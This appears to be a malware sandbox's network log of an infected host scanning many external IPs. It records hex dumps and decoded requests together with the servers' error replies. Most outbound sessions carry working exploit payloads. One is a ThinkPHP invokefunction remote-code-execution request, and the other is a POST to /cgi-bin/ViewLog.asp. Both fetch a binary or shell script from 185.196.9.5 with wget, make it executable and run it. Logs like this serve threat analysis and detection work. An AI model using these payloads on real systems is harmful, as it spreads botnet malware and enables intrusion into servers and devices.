76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
432	192.168.2.15	38844	95.35.28.9	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:34.715900898 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:35.542802095 CET	49	IN	HTTP/1.1 404 Site or Page Not Found
Feb 25, 2024 19:03:35.573101044 CET	308	IN	Data Raw: 53 65 72 76 65 72 3a 20 5a 4b 20 57 65 62 20 53 65 72 76 65 72 0d 0a 44 61 74 65 3a 20 53 75 6e 20 46 65 62 20 32 35 20 32 30 3a 30 33 3a 32 36 20 32 30 32 34 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e Data Ascii: Server: ZK Web ServerDate: Sun Feb 25 20:03:26 2024Pragma: no-cacheCache-Control: no-cacheContent-Type: text/html<html><head><title>Document Error: Site or Page Not Found</title></head><body><h2>Access Error: Site or Page Not F

Session ID	Source IP	Source Port	Destination IP	Destination Port
433	192.168.2.15	40278	62.210.124.225	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:35.240943909 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:35.421868086 CET	305	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:03:35 GMT Server: Apache Content-Length: 127 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 27 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port';</script><h1>Error 400 - trying to redirect</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
434	192.168.2.15	40784	94.125.223.144	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:35.262824059 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
435	192.168.2.15	45684	94.122.216.229	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:35.283493042 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
436	192.168.2.15	47944	62.29.12.172	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:35.283584118 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
437	192.168.2.15	57788	62.29.88.196	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:35.287605047 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
438	192.168.2.15	60968	31.200.35.236	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:35.287986994 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
439	192.168.2.15	57720	112.48.155.162	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:35.563700914 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:35.949819088 CET	958	IN	HTTP/1.1 400 Bad Request Server: Tengine Date: Sun, 25 Feb 2024 18:03:35 GMT Content-Type: text/html Content-Length: 811 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 65 6e 73 2d 63 61 63 68 65 31 34 2e 63 6e 36 36 35 32 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 34 2f 30 32 2f 32 36 20 30 32 3a 30 33 3a 33 35 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body bgcolor="white"><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand. Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http:///index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'</td></tr><tr><td>Server:</td><td>ens-cache14.cn6652</td></tr><tr><td>Date:</td><td>2024/02/26 02:03:35</td></tr></table><hr/>Powered by Tengine</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
440	192.168.2.15	57700	112.48.155.162	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:36.011255026 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:36.400527000 CET	958	IN	HTTP/1.1 400 Bad Request Server: Tengine Date: Sun, 25 Feb 2024 18:03:36 GMT Content-Type: text/html Content-Length: 811 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 65 6e 73 2d 63 61 63 68 65 31 34 2e 63 6e 36 36 35 32 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 34 2f 30 32 2f 32 36 20 30 32 3a 30 33 3a 33 36 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body bgcolor="white"><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand. Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http:///index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'</td></tr><tr><td>Server:</td><td>ens-cache14.cn6652</td></tr><tr><td>Date:</td><td>2024/02/26 02:03:36</td></tr></table><hr/>Powered by Tengine</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
441	192.168.2.15	35918	95.128.144.105	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:36.139231920 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:03:36.631658077 CET	192	IN	HTTP/1.1 302 Moved Date: Sun, 25 Feb 2024 18:03:36 GMT Server: Apache Location: https://10.254.254.253:10443/ Content-Length: 0 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
442	192.168.2.15	40154	95.168.253.81	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:36.163227081 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
443	192.168.2.15	39806	31.136.0.172	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:37.729862928 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:40.774013996 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:46.917829990 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:58.949664116 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:24.037503004 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:13.188918114 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
444	192.168.2.15	46846	31.136.113.51	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:03:37.730324030 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:40.773981094 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:46.917903900 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:03:58.949650049 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:04:24.037399054 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
Feb 25, 2024 19:05:13.188913107 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

